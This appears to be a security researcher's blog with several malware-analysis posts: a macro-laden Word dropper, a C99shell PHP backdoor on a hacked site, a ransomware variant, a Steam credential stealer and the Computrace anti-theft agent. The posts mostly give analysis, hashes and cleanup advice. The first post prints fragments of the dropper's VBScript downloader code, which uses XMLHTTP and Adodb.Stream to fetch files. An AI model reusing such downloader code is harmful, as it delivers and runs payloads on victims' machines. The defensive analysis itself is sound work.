Search this Blog


Friday, May 8, 2015

New malicious Office docs trick

It all starts with the 1,000,000th usual spam mail in your inbox:

Have you received an order form? No.

The content is as follows:


We have received your order form [AY19358KXN]  and we thank you very much. Our sales department informs us that they are able to dispatch your stock by the end of next week following your packing instructions.

As agreed, we have arranged transport. We are sending herewith a copy of our pro-forma invoice.

The consignment will be sent as soon as the bank informs us that the sum is available. We hope you will be satisfied with the fulfilment of this order and that it will be the beginning of a business relationship to our mutual benefit.

Attached is a DOC file with (surprise) a macro attached. However, the method's different than usual:

In the past, there have been some other new tricks as well, for example:
Analyzing an MS Word document not detected by AV software
XML: A New Vector For An Old Trick
Malware authors go a step further to access bank accounts

In regards to any Office files, you can simply open the file in Notepad++ for example and you'll see the .mso appended at the end. The new thing here is that it's a Word MHTML file with macro(s).

Using olevba (by @decalage2), we can extract and automatically decode the .mso object - which contains a bunch of (what appears to be) random gibberish:

Function that "Returns the character associated with the specified character code"

You can use the ASCII character code chart to figure out what this malware is doing exactly, for example the first line Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) is simply "HTTP".

Another option is to use a Python program made by Xavier Mertens,
You can find a Pastebin here with the extracted + deobfuscated macro.

Short analysis of this .doc file using olevba

Other tools are available as well, for example oledump and emldump from Didier Stevens.

Emldump + passing through oledump extracted a malicious link

Now, what happens when you execute this malicious Word file?

Oops, seems macros are disabled :)

If macros are enabled, or you choose to enable the macro in that document, a Pastebin download link was opened and the file was executed. Process flow is:

Word document -> download VBS from Pastebin -> Execute VBS -> Downloads & executes EXE file -> Downloads & executes another EXE file.

Visually, you might get either of these images:

dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
JHyygUBjdfg.Open GET ,

dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
sdfsdfsdf.Open GET ,

Dropper, payload, related files:

AY19358KXN.doc (original file)
SHA1: b2c793b1cf2cf11954492fd52e22a3b8a96dac15

Extracted macro (I named it AY.vb)
SHA1: 79b0d7a7fe917583bc4f73ce1dbffc5497b6974d

JGuigbjbff3f.vbs (dropped VBscript file)
SHA1: c8a914fdc18d43aabbf84732b97676bd17dc0f54
Deobfuscated VBscript

o8237423.exe (dropper)
SHA1: 7edc7afb424e6f8fc5fb5bae3681195800ca8330

DInput8.dll (payload)
SHA1: 8bfe59646bdf6591fa8213b30720553d78357a99



It seems obvious that malware authors are keeping up-to-date with the latest news and as such adapting their campaigns as well. Better be safe than sorry and don't trust anything sent via email. ;-)

If you're in an organisation, you might want to consider blocking the execution of all macros (or only allow the ones that are digitally signed if there's really no other choice) by using GPO.

You can find those templates here:

Note: starting from Office 2010, macros are disabled by default.


Wednesday, March 4, 2015

C99Shell not dead

I recently got contacted on Twitter in regards to a hacked webpage:

After I received the files two things became apparent:

- the webserver (and thus the website) was infected with C99shell
- the webserver was infected with other PHP backdoors

PHP/c99shell or simply c99shell should be well known by now - it is a PHP backdoor that provides a lot of functionality, for example:

- download/upload files from and to the server (FTP functionality)
- run shell commands
- full access to all files on the hard disk
- ...

In short, it can pretty much do everything you want, which results in end-users getting malware onto their systems and/or data getting stolen and/or personal information compromised.

There's an excellent blog post over at Malwaremustdie in regards to C99shell, you can read it here:
How EVIL the PHP/C99Shell can be? From SQL Dumper, Hacktools, to Trojan Distributor Future?

Now, here's one of the files gathered from the webserver:

It's heavily obfuscated as one would expect; after some deobfuscating/decoding we get:

It also has a nice web interface:

Seems like we are dealing with a slightly updated version of C99shell, version 2.1:

And last but not least, some functionality:

You can find the decoded C99shell backdoor on Pastebin:
Decoded PHP/c99shell

Detections aren't too great for this PHP backdoor, but it surely has improved since Malwaremustdie started blogging about it, some VirusTotal results: 0, 1, 2.

As I mentioned before, other PHP backdoors were present, for example:

After some manual decoding, we turn up with the following interesting line:

Another example:

The "x-headers" HTTP_X_UP_CALLING_LINE_ID and HTTP_X_NOKIA_ALIAS are actually part of WML, the Wireless Markup Language.

Thus, this PHP backdoor seems specifically designed to target mobile users. I've put a copy of the script in screenshot above on Pastebin as well:
Unknown PHP backdoor

Darryl from Kahu Security has written an excellent post on how to manually decode this kind of PHP obfuscation: Deobfuscating a Wicked-Looking Script

If you have any information on what kind of PHP backdoor this might be (if not generic), feel free to let me know.


This shouldn't be repeated normally, but I will again just for good measure:

  • Take back-ups regularly! Yes, even for your website.
  • Keep your CMS up-to-date; whether you use WordPress, Joomla, Drupal, ... 
  • Keep your installed plugins up-to-date. Remove any unnecessary plugins.
  • Use strong passwords for your FTP account(s), as well as for your CMS/admin panel login.
  • Use appropriate file permissions - meaning don't use 777 everywhere. (seriously, don't)
  • Depending on how you manage your website - keep your operating system up-to-date and, if applicable, install and update antivirus software.
More (extended) tips can be found over at StopBadware:
Preventing badware: Basics

There are also guides available on how to harden your specific CMS installation, for example:
WordPress: Hardening WordPress
Joomla: Security Checklist/Joomla! Setup
Drupal: Writing secure code


What if your website's already been hacked and serving up malware to the unknowing visitor? Best practice is to simply take your website offline and restore from an earlier back-up. (don't forget to verify if your back-up isn't infected as well)

If that's not a possibility for whatever reason, you'll first need to find where any malicious code was injected (or created) on your website, or how it was infected in the first place.

An easy way would be to simply check all recently changed files on your web server. However, those dates can be altered. So what's a better alternative? You can comb over the files one by one, or you can use an online tool to check your website.

A short overview:
You can use Sucuri's SiteCheck to quickly spot if they detect any malware, see if you're blacklisted and, the most useful part in this case is to check whether or not you have any outdated plugin or CMS running - as well as a list of links.
Use Redleg's file viewer to easily see if any malicious iframes have been injected - you can even choose which Referrer and User Agent should be used (some malware requires you to visit the site via a specific Referrer or User Agent).
Useful additional tool to Redleg's file viewer. Allows you to only fetch headers of a website, or fetch both header and content.
Excellent tool in case any malicious Javascript (iframe) is injected into any of your web server files. Less intuitive, but provides a great overview.
Excellent tool and more graphical as opposed to JSunpack - especially useful is to see if any IDS was triggered as well as JavaScript and HTTP Transactions.
As usual, VirusTotal is a great resource as well - it can pinpoint which Antivirus (if any) is triggering an alert related to your website.

If nothing is found, but you are still receiving reports from either blacklists (eg. Google) or users, you'll have to manually go over all your files to see if any code was attached. Another method (and obviously not foolproof) is to copy over all your files to a Windows system and scan them with an antivirus. I think you're starting to realize why back-ups are important.

If you had any outdated plugins running, chances are very high the backdoor or script was created/added in that specific directory. For example for WordPress this is typically:

You can also install a plugin for your CMS which can scan your web server for any infected files. (Which is ironic, but might still do the trick should you not be able to find anything manually.)

Last but not least: check your access logs! See any unauthorized (FTP) logins for example? Contact your hosting provider - they might be able to assist you as well.

If you're still stuck, feel free to shoot me an email or contact me on Twitter. Otherwise, contact one of X companies which can help you assist in clean-up.

Don't forget: after clean-up, reset all your passwords (and don't use the same for everything) and follow the prevention tips above, or you'll simply get infected again.


C99shell is obviously not dead and neither are other PHP backdoors - or any other malware for that matter. Securing your website is not only beneficial for you, but also for your customers and other visitors. This blog post should have provided you with the essentials on securing your website and cleaning it up should it ever be infected (repeating: best practice is to take it offline and restore from a back-up).


For webmasters:
StopBadware - My site has badware
Google - If your site is infected

For researchers:
Online JavaScript Beautifier -
PHP Formatter -
Kahu Security tools -
(for this specific blog post, PHP Converter is a must-use and very effective tool)
Base 64 Decoder -

Above list is obviously my own personal flavor, feel free to leave a comment with your favorite tool.

Friday, February 13, 2015

Yet another ransomware variant

The blog post of today is a bit different than usual, as you can read the full post on the Panda Security blog. Read it here: Yet another ransomware variant

In this post I'm simply adding some additional information and repeating the most important points.

So, there's yet another ransomware variant on the loose. You may call this one Chuingam (chewing gum?) ransomware or Xwin ransomware - pointing to respectively the file with this string 'Chuingam' dropped, or in the latter case the folder on C:\ it creates. Or just another (skiddie) Generic Ransomware.

In the blog post above, I discuss the methodology to encrypt files it uses and how it creates your own personal key, as well as the ransom message and how to recover files (if you're lucky & fast enough).

pgp.exe (PGP) is used to generate the public RSA key. Since pgp.exe requires the RAR password, this is temporarily stored in the file "filepas.tmp" - which is overwritten and deleted, so no chance to recover this file.

process flow graph of pgp.exe (made using procDOT)

As a note; it will (try to) encrypt any and all files with the following extensions:
jpg, jpeg, doc, txt, pdf, tif, dbf, eps, psd, cdr, tst,  MBD, xml,  xls, dwg, mdf, mdb, zip, rar, cdx, docx, wps, rtf, 1CD, 4db, 4dd, adp, ADP, xld, wdb, str, pdm, itdb, pst, ptx, dxg, ppt, pptx

If you've been infected with this ransomware, best thing to do is to either restore from a backup or try to restore previous files (also known as shadow copies).

For additional information in regards to this specific ransomware, refer to:
Yet another ransomware variant

For any further background information on ransomware or further prevention & disinfection advice, I refer to my Q&A on ransomware.

Hashes (SHA1)


Sunday, November 16, 2014

Malware spreading via Steam chat

If you're only interested in how to remove this malware from your machine or other tips and prevention advise, click here. In case you have questions, issues or doubts, feel free to leave a comment and I'll be happy to help or answer any questions you may have. (you may have to click 'Load more...' to view all comments)

Today I was brought to the attention of a Tumblr post - apparently there's malware doing the rounds making use of Steam chat, (adding Steam friends and) spamming Steam users.

Example message:
"karpathos" sending a link (Image source)

Onyx is right, the link's indeed phishy and uses (a URL shortener) to trick users into clicking it. Remember the worm that spread via Skype and Messenger last year? (reference here and here) This is a similar campaign.


Someone adds you on Steam, you accept and immediately a chat pops up as similar to above.

Alternatively someone from your friends list already got infected and is now sending the same message to all his/her friends.

The link actually refers to a page on Google Drive, which immediately downloads a file called IMG_211102014_17274511.scr, which is in fact a Screensaver file - an executable.
The file is shared by someone named "qwrth gqhe". Looks legit.

Note that normally, the Google Drive Viewer application will be shown and this will allow you to download the .scr file. In this case, the string "&confirm=no_antivirus" is added to the link, which means the file will pop-up immediately asking what to do: Run or Save.
(and in some cases download automatically)

At time of writing, the file is actually still being hosted by Google Drive. I have reported it however.

Afterwards, you're presented with the screensaver file which has the following icon:
Image of IMG_211102014_17274511.scr file

Opening the file will result in installing malware on your system, which will steal your Steam credentials.

Technical details


File:    IMG_211102014_17274511.scr
Size:    1031168 bytes
Type:    PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
MD5:     138ec432db0dd6b1f52f66cc534303db
VirusTotal: link

Version info
Translation: 0x0000 0x04b0
LegalCopyright: \xa9 Microsoft Corporation. All rights reserved.
Assembly Version: 6.0.6000.16384
InternalName: wrrrrrrrrrrrr.exe
FileVersion: 6.0.6000.16384
CompanyName: Windows (R) Codename Longhorn DDK provider
Comments: Office Licensing Admin Access Provider
ProductName: Windows (R) Codename Longhorn DDK driver
ProductVersion: 6.0.6000.16384
FileDescription: LICLUA.exe
OriginalFilename: wrrrrrrrrrrrr.exe

Connects to:

Server in Czech Republic. VirusTotal reference

Downloads and executes:

File:    temp.exe
Size:    4525568 bytes
Type:    PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
MD5:     d0f8b90c85e5bedb691fca5c571a6794
SHA1:    cd9b3bf5c8d70e833b5c580c9b2fc1f3e5e4341e
VirusTotal: link

Version info
Translation: 0x0000 0x04b0
Assembly Version:
InternalName: vv.exe
OriginalFilename: vv.exe

Interesting information in the debug path, note the "steamstealer" string. Screenshot via PeStudio


What if you clicked the link and executed the file? Follow these steps:

  • Exit Steam immediately
  • Open up Task Manager and find a process called temp.exewrrrrrrrrrrrr.exevv.exe or a process with a random name, for example 340943.exe or a process similar to the file you executed
  • Launch a scan with your installed antivirus
  • Launch a scan with another, online antivirus or install & scan with Malwarebytes
  • When the malware has been disinfected or deleted, change your Steam password - if you use the same password for other sites, change those as well
  • De-authorize any unknown machines, read how to do that here:
    Family Library Sharing User Guide
  • Verify none of your Steam items are missing - if so, it is advised to reinstall Steam as well.
    Note: move the Steamapps folder (default on C:\Program Files\Steam\Steamapps) outside of the Steam directory to prevent your games from being deleted
  • Contact Steam/Valve in order to get your items back:
    Send a ticket to Steam support


  • Be wary when someone new adds you on Steam and immediately starts sending links
  • In fact, don't click on links someone unknown sends to you
  • If you did, don't open or execute anything else - just close the webpage (if any) or cancel the download
  • By default, file extensions are not shown. Enable 'Show file extensions' to see the real file type. Read how to do that here
  • Install WOT - WOT is a community-based tool and is therefore very useful for those fake screenshot websites, whereas other users can warn you about the validity.
  • Follow the tips by Steam itself to further protect your account:
    Account Security Recommendations


    Never click on unknown links, especially when a URL shortener service like is used. (others are for example,, tinyurl, etc.)
    Don't be fooled by known icons or "legit" file descriptions, this can easily be altered.

    Even if you clicked the link and you're not suspicious, you should be when a file is downloaded and it's (in this case) a screensaver file.

    For checking what is really behind a short URL, you can use:

    For checking whether a file is malicious or not:

    Follow the prevention tips above to stay safe.

    Monday, November 10, 2014

    Thoughts on Absolute Computrace


    Not too long ago my friend and colleague from Sweden, Jimmy, contacted me in regards to a strange issue. In the firewall, he saw tons of outgoing connections to a certain server:

    Each second outgoing connection to

    A quick Google search revealed this was actually part of Absolute's Computrace tool - aka Absolute Persistence. Doesn't ring a bell? Try Lojack. From their website:

    List of BIOS & firmware compatibility:

    Why would this be an issue? First of all, there has been some excellent research by Anibal Sacco and Alfredo Ortega here: Deactivate the Rootkit, in which they describe attacks on BIOS anti-theft technologies, which Absolute also offers. An excerpt from their paper:

    In order to be an effective system, the anti-theft agent must be stealthy, must have complete control of the system, and most importantly, must be highly persistent because wiping of the whole system most often occurs in the case of theft.
    This activity is also consistent with rootkit behavior, the only difference being that rootkits are generally malicious, while anti-theft technologies act as a form of protection against thieves.

    Secondly, there has been research from Kaspersky as well on the subject, read their blog post here: Absolute Computrace Revisited

    I advise you to read their post, as it provides excellent information as well. I'm not going to repeat their research here, as it's pretty extended. What you should remember however:

    While Absolute Software is a legitimate company and information about Computrace product is available on the company's official website, the owner of the system claimed he had never installed Absolute Computrace and didn't even know the software was present on his computer. It could be assumed that the software was pre-installed by an OEM manufacturer or reseller company, but according to an Absolute Software whitepaper this should be done by users or their IT service. Unless you have a private IT service or your PC vendor took care of you, someone else has full access and control over your computer.

    Back to our post. After booting the machine and pressing F1 to access the BIOS settings, we are presented with the following screen:

    Lenovo ThinkPad (BIOS version: J9ET58WW)

    This was the initial state of Computrace in the BIOS. The setting was Enabled and the state indicated Not Activated. This suggests Computrace is not active on the machine... Wrong!

    The Item Specific Help reads:

    Enables or disables the UEFI interface to activate Computrace module. Computrace is an optional monitoring service from Absolute Software.
    [Enabled] Enables the Computrace activation.
    [Disabled] Disables the Computrace activation.
    [Permanently Disabled] Permanently disables the Computrace activation.

    The machine was freshly bought and the user never ordered, installed or even heard of Computrace software. In this case, the reseller didn't install it either. This leaves the option the manufacterer or a possible previous owner [or someone else] installed Computrace.

    ... When we want to permanently disable Computrace:

    Computrace module activation warning

    Here comes the fun part: even after permanently disabling the Computrace module, the software was still active and running; contacting the server ( like crazy.

    I decided to contact Absolute Software in order to get an answer as to why this behaviour was occurring. Since neither of us are customers, I used the form here to contact them.

    After two days I got a reply from their customer service. In reply as to why permanently disabling didn't seem to work:

    It is also worth noting that many used or refurbished devices may have motherboards with a Computrace BIOS module that was activated by the previous owner.  In these cases, my recommendation would be the following:

    1.       Obtain and install any missing or outdated HECI\Intel Management\IMEI drivers from the manufacturer.  Once these drivers are in place, any potential Absolute software installed on the computer will correctly communicate with the BIOS and it should automatically deactivate itself over the course of a few days.

    2.       Contact the manufacturer and request a motherboard replacement.  Activated motherboards should not be re-sold by manufacturers or retailers if the necessary de-activation steps are not taken first.

    Reason for seeing numerous outgoing connections to their server is probably due to their module wanting to receive instructions from the server that the original license should no longer be active, or to download new binaries.

    Binaries & BIOS information & characteristics

    There's already a good list available by Kaspersky which I'm not going to repeat here. You can find that list on this link.

    However, the following points are worth noting:

    • Two new binaries (different hashes) have been identified:
      ad73c636bb2ead416dfa541a74aea016 (wceprv.dll)
      4011590af6f13a42a869ae57d6174f4f (rpcnetp.exe)
    • Several files are packed with UPX
    • The wceprv.dll module has a Digital Signature which is issued to
      Absolute Software Corp. 
      Serial Number: 35:ba:ec:87:59:d7:84:62:c3:d2:b7:ff:d4:c4:6e:51
    • Machines will have an altered Master Boot Record (MBR); this is because Computrace parses the MBR and partition table - it writes some data into the sectors before the primary partition. According to the patent (US 20060272020 A1):
      In another embodiment, the CLM is stored in a substitute Master Boot Record (MBR), or a combination of the foregoing.

    CLM or Computrace Loader Module is one of Computrace's main modules. (besides the Adaptive Installer Module (AIM) and the Communications Driver Agent (CDA) - see the patent for reference)

    How to determine if you have Absolute Computrace installed

    First things first: check in the BIOS if there's a mention of Absolute Computrace somewhere:
    (re)boot your machine and access the BIOS with one of the Function keys on your keyboard. 

    Typically, this is F2, but may differ. See here for a complete list:
    BIOS Setup Utility Access Keys for Popular Computer Systems

    Secondly, see if any of the files mentioned in Kasperky's blog post are running or exist on the file system. For the full list see here, but keep in mind the two new additional hashes added above.
    Note that new hashes may pop-up as well.

    Thirdly, network activity as mentioned in above blog post.
    (but mainly to or

    How to remove or uninstall Absolute Computrace

    I won't provide any specific information on how to remove or uninstall Computrace, as its main purpose is still - and I quote:

    [...] to perform preemptive and reactive security measures to safeguard a missing, lost, or stolen device and the data it contains. With Computrace Mobile you can determine the location of the device and whether or not it’s on the move. You can also freeze it to prevent unauthorized access and send a message to the user to validate the status of the device. If the device contains important information, you can remotely retrieve files or delete them immediately. And you can generate an audit log of the data that’s been removed so you can prove compliance with corporate and government regulations.

    However, should you have bought (what you believe is) a new machine and it is apparent Computrace is active, download the latest drivers fit for your system:
    Download BIOS drivers  Also find information on How to Update Your Computer's BIOS.

    When correctly executed and the option for Computrace in the BIOS is set to Permanently Disabled, it should correctly disable itself - taken into account the original license has expired or the original owner deactivated it, if existent.

    Another option would be to request a motherboard replacement for your machine, as suggested above. Additionally you may reinstall the Operating System afterwards.

    Absolute Computrace FAQ

    Is Computrace malicious?

    Which devices does Computrace support and may be installed on?


    So yes, it's possible Computrace is installed on any other of your (mobile) devices. If you're looking for pointers, once again look for outbound connections to * or *

    Which firmware or BIOS brands does Computrace support and may be installed on?

    • Acer
    • Apple
    • ASUS
    • Daten
    • DELL
    • Fujitsu
    • GammaTech
    • General Dynamics Itronix
    • Getac
    • HP
    • Lenovo
    • Microsoft
    • Motion
    • NEC
    • Panasonic
    • Samsung
    • Sony
    • Toshiba
    • Winmate
    • Xplore Technologies

    How recent was the Computrace agent variant you found?
    I added this question as to compare it with Kaspersky's binary- which was compiled in June 2012

    This variant of the Computrace agent was compiled in May 2012 (assuming it's not altered)

    Another version of Computrace was found. Note that this is possibly due to small updates of the loader or agent module.

    Will flashing the BIOS remove Computrace?
    No, as it resides in a non-flashable portion of the BIOS.

    Will downloading the latest BIOS drivers for my machine remove Computrace?
    See "How to remove or uninstall Absolute Computrace".

    I'd like to see more information about my BIOS/EFI/coreboot/firmware/optionROM.
    You can use the excellent tool flashrom. If you are using anything but Windows, Anibal and Alfredo have also written a Python program to to dump the BIOS firmware and search for a CompuTrace Option ROM: (Note: you'll need to apt-get flashRom/dmiDecode/UPX)

    What if I'm a customer of Computrace and have doubts or want more information? 
    Best thing to do is call them directly: +00 1 877 337 0337 (US number), choose option #1. The general number in Europe is: +44 118 902 2005 and for Asia: +65 6595 4594

    More information on how to contact them as existing customer can be found here:
    Absolute Software Support

    What if I'm not a customer of Computrace and have doubts or want more information?
    You can still use the numbers above if you like, or you can use the Absolute Software Contact Form.

    What if I suspect I bought a stolen machine which has Computrace installed?
    Contact Absolute Software (see above)! They will set up a case together with you and law enforcement.

    Is there similar software out there like Computrace?
    Yes, but it is not exactly the same as Computrace. An example is Prey. Another example is Intel's Anti-Theft Technology - which apparently will cease to exist in January 2015. Source:
    Intel Anti-Theft Service FAQ

    Nowadays, most Antivirus vendors also offer some form of anti-theft. For more information, refer to the corresponding websites of the vendors.

    Why did you decide to write this blog post?
    To provide even more additional & useful information, as well as out of sheer interest.

    Do you have any additional information to share? 
    Yes, see right below in the Resources section.


    Absolute Software - Perspective on Kaspersky Report & FAQ
    Absolute Software - Persistent servicing agent  (Patent US20060272020 A1)
    Corelabs - Deactivate the rootkit (PDF)
    Kaspersky - Absolute Computrace Revisited
    Kaspersky - Absolute Computrace: Frequently Asked Questions


    I'd like to thank, in no particular order:

    • Anibal Sacco and Alfredo Ortega for their initial research.
    • Alfredo Ortega for a refreshing chat and answering some additional doubts I had.
    • Vitaliy Kamlyuk and Sergey Belov for their additional/follow-up research.
    • Absolute Software's service desk/support specialists for their service & answering any questions I had.

    Thank you for reading.